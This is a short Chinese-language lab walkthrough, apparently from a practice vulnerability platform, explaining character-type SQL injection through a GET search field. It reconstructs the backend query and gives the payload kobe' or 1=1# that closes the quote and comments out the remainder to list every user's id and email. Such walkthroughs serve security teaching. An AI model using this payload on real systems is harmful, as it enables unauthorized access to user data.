2.SQL注入-字符型

SQL注入-字符型(get)

输入kobe查询出现id和邮箱

猜测语句,字符在数据库中需要用到单引号或者双引号
select 字段1,字段2 from 表名 where username='kobe';

在数据库中查询对应的kobe，根据上图对应上。

select id,email from member where username='kobe';

编写payload语句，添加or 1=1#

select id,email from member where username='kobe';
需要添加单引号闭合前面的单引号，后面的单引号需要用到井号进行注释掉，或者用--注释
select id,email from member where username='kobe' or 1=1#';

在搜索框中输入语句为

kobe' or 1=1#

如图所示，所有用户信息展示出来。

通过前端输入条件，传参到后端数据库的配置文件逻辑